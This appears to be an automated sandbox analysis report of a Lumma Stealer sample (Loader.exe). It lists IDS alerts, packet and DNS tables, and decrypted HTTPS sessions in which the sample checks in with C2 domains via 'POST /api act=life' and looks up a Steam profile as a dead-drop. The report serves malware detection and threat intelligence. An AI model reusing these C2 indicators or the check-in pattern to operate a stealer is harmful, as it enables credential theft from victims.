2024-12-13T18:52:11.588142+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	104.21.32.1	443	TCP
2024-12-13T18:52:12.328476+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49732	104.21.32.1	443	TCP
2024-12-13T18:52:12.328476+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49732	104.21.32.1	443	TCP
2024-12-13T18:52:15.371835+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	23.55.153.106	443	TCP
2024-12-13T18:52:16.289176+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	49733	23.55.153.106	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 18:52:05.739778042 CET	49730	443	192.168.2.4	104.21.32.1
Dec 13, 2024 18:52:05.739859104 CET	443	49730	104.21.32.1	192.168.2.4
Dec 13, 2024 18:52:05.739979029 CET	49730	443	192.168.2.4	104.21.32.1
Dec 13, 2024 18:52:05.743164062 CET	49730	443	192.168.2.4	104.21.32.1
Dec 13, 2024 18:52:05.743182898 CET	443	49730	104.21.32.1	192.168.2.4
Dec 13, 2024 18:52:07.012684107 CET	443	49730	104.21.32.1	192.168.2.4
Dec 13, 2024 18:52:07.012813091 CET	49730	443	192.168.2.4	104.21.32.1
Dec 13, 2024 18:52:07.017875910 CET	49730	443	192.168.2.4	104.21.32.1
Dec 13, 2024 18:52:07.017890930 CET	443	49730	104.21.32.1	192.168.2.4
Dec 13, 2024 18:52:07.018173933 CET	443	49730	104.21.32.1	192.168.2.4
Dec 13, 2024 18:52:07.071985006 CET	49730	443	192.168.2.4	104.21.32.1
Dec 13, 2024 18:52:07.091283083 CET	49730	443	192.168.2.4	104.21.32.1
Dec 13, 2024 18:52:07.091309071 CET	49730	443	192.168.2.4	104.21.32.1
Dec 13, 2024 18:52:07.091404915 CET	443	49730	104.21.32.1	192.168.2.4
Dec 13, 2024 18:52:07.740994930 CET	443	49730	104.21.32.1	192.168.2.4
Dec 13, 2024 18:52:07.741096020 CET	443	49730	104.21.32.1	192.168.2.4
Dec 13, 2024 18:52:07.741179943 CET	49730	443	192.168.2.4	104.21.32.1
Dec 13, 2024 18:52:07.743196011 CET	49730	443	192.168.2.4	104.21.32.1
Dec 13, 2024 18:52:07.743216991 CET	443	49730	104.21.32.1	192.168.2.4
Dec 13, 2024 18:52:07.743230104 CET	49730	443	192.168.2.4	104.21.32.1
Dec 13, 2024 18:52:07.743235111 CET	443	49730	104.21.32.1	192.168.2.4
Dec 13, 2024 18:52:08.065829039 CET	49731	443	192.168.2.4	104.21.22.222
Dec 13, 2024 18:52:08.065885067 CET	443	49731	104.21.22.222	192.168.2.4
Dec 13, 2024 18:52:08.066087008 CET	49731	443	192.168.2.4	104.21.22.222
Dec 13, 2024 18:52:08.066411018 CET	49731	443	192.168.2.4	104.21.22.222
Dec 13, 2024 18:52:08.066428900 CET	443	49731	104.21.22.222	192.168.2.4
Dec 13, 2024 18:52:09.293340921 CET	443	49731	104.21.22.222	192.168.2.4
Dec 13, 2024 18:52:09.293459892 CET	49731	443	192.168.2.4	104.21.22.222
Dec 13, 2024 18:52:09.333875895 CET	49731	443	192.168.2.4	104.21.22.222
Dec 13, 2024 18:52:09.333906889 CET	443	49731	104.21.22.222	192.168.2.4
Dec 13, 2024 18:52:09.334610939 CET	443	49731	104.21.22.222	192.168.2.4
Dec 13, 2024 18:52:09.350548029 CET	49731	443	192.168.2.4	104.21.22.222
Dec 13, 2024 18:52:09.350579977 CET	49731	443	192.168.2.4	104.21.22.222
Dec 13, 2024 18:52:09.350682020 CET	443	49731	104.21.22.222	192.168.2.4
Dec 13, 2024 18:52:10.020309925 CET	443	49731	104.21.22.222	192.168.2.4
Dec 13, 2024 18:52:10.020550013 CET	443	49731	104.21.22.222	192.168.2.4
Dec 13, 2024 18:52:10.020639896 CET	49731	443	192.168.2.4	104.21.22.222
Dec 13, 2024 18:52:10.020692110 CET	49731	443	192.168.2.4	104.21.22.222
Dec 13, 2024 18:52:10.020719051 CET	443	49731	104.21.22.222	192.168.2.4
Dec 13, 2024 18:52:10.020734072 CET	49731	443	192.168.2.4	104.21.22.222
Dec 13, 2024 18:52:10.020740032 CET	443	49731	104.21.22.222	192.168.2.4
Dec 13, 2024 18:52:10.364279985 CET	49732	443	192.168.2.4	104.21.32.1
Dec 13, 2024 18:52:10.364325047 CET	443	49732	104.21.32.1	192.168.2.4
Dec 13, 2024 18:52:10.364445925 CET	49732	443	192.168.2.4	104.21.32.1
Dec 13, 2024 18:52:10.365715027 CET	49732	443	192.168.2.4	104.21.32.1
Dec 13, 2024 18:52:10.365727901 CET	443	49732	104.21.32.1	192.168.2.4
Dec 13, 2024 18:52:11.588051081 CET	443	49732	104.21.32.1	192.168.2.4
Dec 13, 2024 18:52:11.588141918 CET	49732	443	192.168.2.4	104.21.32.1
Dec 13, 2024 18:52:11.592721939 CET	49732	443	192.168.2.4	104.21.32.1
Dec 13, 2024 18:52:11.592741013 CET	443	49732	104.21.32.1	192.168.2.4
Dec 13, 2024 18:52:11.593100071 CET	443	49732	104.21.32.1	192.168.2.4
Dec 13, 2024 18:52:11.595747948 CET	49732	443	192.168.2.4	104.21.32.1
Dec 13, 2024 18:52:11.595779896 CET	49732	443	192.168.2.4	104.21.32.1
Dec 13, 2024 18:52:11.595825911 CET	443	49732	104.21.32.1	192.168.2.4
Dec 13, 2024 18:52:12.328552961 CET	443	49732	104.21.32.1	192.168.2.4
Dec 13, 2024 18:52:12.328795910 CET	443	49732	104.21.32.1	192.168.2.4
Dec 13, 2024 18:52:12.328862906 CET	49732	443	192.168.2.4	104.21.32.1
Dec 13, 2024 18:52:12.328977108 CET	49732	443	192.168.2.4	104.21.32.1
Dec 13, 2024 18:52:12.328994989 CET	443	49732	104.21.32.1	192.168.2.4
Dec 13, 2024 18:52:13.976902962 CET	49733	443	192.168.2.4	23.55.153.106
Dec 13, 2024 18:52:13.976954937 CET	443	49733	23.55.153.106	192.168.2.4
Dec 13, 2024 18:52:13.977168083 CET	49733	443	192.168.2.4	23.55.153.106
Dec 13, 2024 18:52:13.978451014 CET	49733	443	192.168.2.4	23.55.153.106
Dec 13, 2024 18:52:13.978478909 CET	443	49733	23.55.153.106	192.168.2.4
Dec 13, 2024 18:52:15.371539116 CET	443	49733	23.55.153.106	192.168.2.4
Dec 13, 2024 18:52:15.371834993 CET	49733	443	192.168.2.4	23.55.153.106
Dec 13, 2024 18:52:15.373733044 CET	49733	443	192.168.2.4	23.55.153.106
Dec 13, 2024 18:52:15.373747110 CET	443	49733	23.55.153.106	192.168.2.4
Dec 13, 2024 18:52:15.374056101 CET	443	49733	23.55.153.106	192.168.2.4
Dec 13, 2024 18:52:15.375808001 CET	49733	443	192.168.2.4	23.55.153.106
Dec 13, 2024 18:52:15.419341087 CET	443	49733	23.55.153.106	192.168.2.4
Dec 13, 2024 18:52:16.289211035 CET	443	49733	23.55.153.106	192.168.2.4
Dec 13, 2024 18:52:16.289237022 CET	443	49733	23.55.153.106	192.168.2.4
Dec 13, 2024 18:52:16.289279938 CET	443	49733	23.55.153.106	192.168.2.4
Dec 13, 2024 18:52:16.289288998 CET	49733	443	192.168.2.4	23.55.153.106
Dec 13, 2024 18:52:16.289305925 CET	443	49733	23.55.153.106	192.168.2.4
Dec 13, 2024 18:52:16.289352894 CET	49733	443	192.168.2.4	23.55.153.106
Dec 13, 2024 18:52:16.289385080 CET	49733	443	192.168.2.4	23.55.153.106
Dec 13, 2024 18:52:16.465384007 CET	443	49733	23.55.153.106	192.168.2.4
Dec 13, 2024 18:52:16.465441942 CET	443	49733	23.55.153.106	192.168.2.4
Dec 13, 2024 18:52:16.465538025 CET	49733	443	192.168.2.4	23.55.153.106
Dec 13, 2024 18:52:16.465554953 CET	443	49733	23.55.153.106	192.168.2.4
Dec 13, 2024 18:52:16.465605021 CET	49733	443	192.168.2.4	23.55.153.106
Dec 13, 2024 18:52:16.503576994 CET	443	49733	23.55.153.106	192.168.2.4
Dec 13, 2024 18:52:16.503623009 CET	443	49733	23.55.153.106	192.168.2.4
Dec 13, 2024 18:52:16.503664017 CET	443	49733	23.55.153.106	192.168.2.4
Dec 13, 2024 18:52:16.503701925 CET	49733	443	192.168.2.4	23.55.153.106
Dec 13, 2024 18:52:16.503750086 CET	49733	443	192.168.2.4	23.55.153.106
Dec 13, 2024 18:52:16.504096031 CET	49733	443	192.168.2.4	23.55.153.106
Dec 13, 2024 18:52:16.504117966 CET	443	49733	23.55.153.106	192.168.2.4
Dec 13, 2024 18:52:16.504129887 CET	49733	443	192.168.2.4	23.55.153.106
Dec 13, 2024 18:52:16.504138947 CET	443	49733	23.55.153.106	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 18:52:05.352965117 CET	55439	53	192.168.2.4	1.1.1.1
Dec 13, 2024 18:52:05.734342098 CET	53	55439	1.1.1.1	192.168.2.4
Dec 13, 2024 18:52:07.753819942 CET	61325	53	192.168.2.4	1.1.1.1
Dec 13, 2024 18:52:08.064440012 CET	53	61325	1.1.1.1	192.168.2.4
Dec 13, 2024 18:52:10.039299965 CET	64424	53	192.168.2.4	1.1.1.1
Dec 13, 2024 18:52:10.363301992 CET	53	64424	1.1.1.1	192.168.2.4
Dec 13, 2024 18:52:12.330790997 CET	49779	53	192.168.2.4	1.1.1.1
Dec 13, 2024 18:52:12.563797951 CET	53	49779	1.1.1.1	192.168.2.4
Dec 13, 2024 18:52:12.603447914 CET	63213	53	192.168.2.4	1.1.1.1
Dec 13, 2024 18:52:12.826731920 CET	53	63213	1.1.1.1	192.168.2.4
Dec 13, 2024 18:52:12.828140020 CET	58752	53	192.168.2.4	1.1.1.1
Dec 13, 2024 18:52:13.053798914 CET	53	58752	1.1.1.1	192.168.2.4
Dec 13, 2024 18:52:13.058008909 CET	60901	53	192.168.2.4	1.1.1.1
Dec 13, 2024 18:52:13.386074066 CET	53	60901	1.1.1.1	192.168.2.4
Dec 13, 2024 18:52:13.389430046 CET	50878	53	192.168.2.4	1.1.1.1
Dec 13, 2024 18:52:13.610142946 CET	53	50878	1.1.1.1	192.168.2.4
Dec 13, 2024 18:52:13.613162041 CET	52831	53	192.168.2.4	1.1.1.1
Dec 13, 2024 18:52:13.834634066 CET	53	52831	1.1.1.1	192.168.2.4
Dec 13, 2024 18:52:13.837630033 CET	49843	53	192.168.2.4	1.1.1.1
Dec 13, 2024 18:52:13.975923061 CET	53	49843	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 13, 2024 18:52:05.352965117 CET	192.168.2.4	1.1.1.1	0x5bb7	Standard query (0)	brendon-sharjen.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:07.753819942 CET	192.168.2.4	1.1.1.1	0xc502	Standard query (0)	immureprech.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:10.039299965 CET	192.168.2.4	1.1.1.1	0x52f8	Standard query (0)	deafeninggeh.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:12.330790997 CET	192.168.2.4	1.1.1.1	0xdcd7	Standard query (0)	effecterectz.xyz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:12.603447914 CET	192.168.2.4	1.1.1.1	0xede1	Standard query (0)	diffuculttan.xyz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:12.828140020 CET	192.168.2.4	1.1.1.1	0xd383	Standard query (0)	debonairnukk.xyz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:13.058008909 CET	192.168.2.4	1.1.1.1	0x1feb	Standard query (0)	wrathful-jammy.cyou	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:13.389430046 CET	192.168.2.4	1.1.1.1	0x504a	Standard query (0)	awake-weaves.cyou	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:13.613162041 CET	192.168.2.4	1.1.1.1	0xbb89	Standard query (0)	sordid-snaked.cyou	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:13.837630033 CET	192.168.2.4	1.1.1.1	0xeb20	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 13, 2024 18:52:05.734342098 CET	1.1.1.1	192.168.2.4	0x5bb7	No error (0)	brendon-sharjen.biz		104.21.32.1	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:05.734342098 CET	1.1.1.1	192.168.2.4	0x5bb7	No error (0)	brendon-sharjen.biz		104.21.48.1	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:05.734342098 CET	1.1.1.1	192.168.2.4	0x5bb7	No error (0)	brendon-sharjen.biz		104.21.16.1	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:05.734342098 CET	1.1.1.1	192.168.2.4	0x5bb7	No error (0)	brendon-sharjen.biz		104.21.96.1	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:05.734342098 CET	1.1.1.1	192.168.2.4	0x5bb7	No error (0)	brendon-sharjen.biz		104.21.80.1	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:05.734342098 CET	1.1.1.1	192.168.2.4	0x5bb7	No error (0)	brendon-sharjen.biz		104.21.112.1	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:05.734342098 CET	1.1.1.1	192.168.2.4	0x5bb7	No error (0)	brendon-sharjen.biz		104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:08.064440012 CET	1.1.1.1	192.168.2.4	0xc502	No error (0)	immureprech.biz		104.21.22.222	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:08.064440012 CET	1.1.1.1	192.168.2.4	0xc502	No error (0)	immureprech.biz		172.67.207.38	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:10.363301992 CET	1.1.1.1	192.168.2.4	0x52f8	No error (0)	deafeninggeh.biz		104.21.32.1	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:10.363301992 CET	1.1.1.1	192.168.2.4	0x52f8	No error (0)	deafeninggeh.biz		104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:10.363301992 CET	1.1.1.1	192.168.2.4	0x52f8	No error (0)	deafeninggeh.biz		104.21.112.1	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:10.363301992 CET	1.1.1.1	192.168.2.4	0x52f8	No error (0)	deafeninggeh.biz		104.21.16.1	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:10.363301992 CET	1.1.1.1	192.168.2.4	0x52f8	No error (0)	deafeninggeh.biz		104.21.48.1	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:10.363301992 CET	1.1.1.1	192.168.2.4	0x52f8	No error (0)	deafeninggeh.biz		104.21.96.1	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:10.363301992 CET	1.1.1.1	192.168.2.4	0x52f8	No error (0)	deafeninggeh.biz		104.21.80.1	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:12.563797951 CET	1.1.1.1	192.168.2.4	0xdcd7	Name error (3)	effecterectz.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:12.826731920 CET	1.1.1.1	192.168.2.4	0xede1	Name error (3)	diffuculttan.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:13.053798914 CET	1.1.1.1	192.168.2.4	0xd383	Name error (3)	debonairnukk.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:13.386074066 CET	1.1.1.1	192.168.2.4	0x1feb	Name error (3)	wrathful-jammy.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:13.610142946 CET	1.1.1.1	192.168.2.4	0x504a	Name error (3)	awake-weaves.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:13.834634066 CET	1.1.1.1	192.168.2.4	0xbb89	Name error (3)	sordid-snaked.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:52:13.975923061 CET	1.1.1.1	192.168.2.4	0xeb20	No error (0)	steamcommunity.com		23.55.153.106	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

brendon-sharjen.biz

immureprech.biz

deafeninggeh.biz

steamcommunity.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.32.1	443	4308	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:52:07 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: brendon-sharjen.biz
2024-12-13 17:52:07 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-13 17:52:07 UTC	1016	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:52:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=plnjfce47r4d2krk0cfne5k627; expires=Tue, 08-Apr-2025 11:38:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3wMGtZ2Wb3djv0bxqKwKPsgYKnbS%2BnIby%2FT62aY8S4ozFJKotre1yxGQxBWHrdbI9sCPkWlPD%2FJMgr8xQi5DzwdZYONe97Om0MVzcssyLgYoB57eP6I2bn5rpcCWn0W%2FcK0mBGd1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f17ce5d8e6b8cda-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2557&min_rtt=1814&rtt_var=1211&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2851&recv_bytes=910&delivery_rate=1609702&cwnd=242&unsent_bytes=0&cid=4f4723b98e477540&ts=745&x=0"
2024-12-13 17:52:07 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-13 17:52:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	104.21.22.222	443	4308	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:52:09 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: immureprech.biz
2024-12-13 17:52:09 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-13 17:52:10 UTC	1013	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:52:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=889oa5pahaski41vcq71l7a6v6; expires=Tue, 08-Apr-2025 11:38:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uShNfas4QN%2FazxCyIIldBMD%2F5rVtWFp2JZ0BKDrrrHmU1Vm7iE7cVSf1BJh1ph0fLDPQoZL2ryydxpyfAaJ18WJPxOHdhZ%2FKE71G34%2FQAMmiRpCQBbZO3M85k1j4w0uaDzE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f17ce6bc9ed7274-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1882&min_rtt=1844&rtt_var=768&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=906&delivery_rate=1358139&cwnd=182&unsent_bytes=0&cid=cc53c2da98fc91d7&ts=738&x=0"
2024-12-13 17:52:10 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-13 17:52:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	104.21.32.1	443	4308	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:52:11 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: deafeninggeh.biz
2024-12-13 17:52:11 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-13 17:52:12 UTC	1015	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:52:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bm97fb4vgla24ftupvv7j0lqpo; expires=Tue, 08-Apr-2025 11:38:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=47eg58gdgQpqu6pXtPLek%2B%2BFXQdc%2FnBCvsPLFYCLcxp1vHDRlNFHTDqErp5OhUMNmBhk9R8KOZV%2BD5vJWgDH3x5aWAaKal%2F1wUZmbYk%2BvkKKwo7gQgbeIN7tDdhncO5Wp6yd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f17ce7a2a7c8cda-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1794&min_rtt=1778&rtt_var=699&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1528795&cwnd=242&unsent_bytes=0&cid=263a44663494ab0b&ts=755&x=0"
2024-12-13 17:52:12 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-13 17:52:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	23.55.153.106	443	4308	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:52:15 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-13 17:52:16 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Fri, 13 Dec 2024 17:52:16 GMT Content-Length: 35131 Connection: close Set-Cookie: sessionid=249fd1b9764e54e9d57eedf9; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-13 17:52:16 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-13 17:52:16 UTC	10097	IN	Data Raw: 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
2024-12-13 17:52:16 UTC	10555	IN	Data Raw: 3b 57 45 42 5f 55 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 Data Ascii: ;WEB_UNIVERSE":"public","LANGUAGE":"english","COUNTRY":"US","MEDIA_CDN_COMMUNITY_URL":"https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/","MEDIA_CDN_URL":&qu

Target ID:	0
Start time:	12:52:03
Start date:	13/12/2024
Path:	C:\Users\user\Desktop\Loader.exe
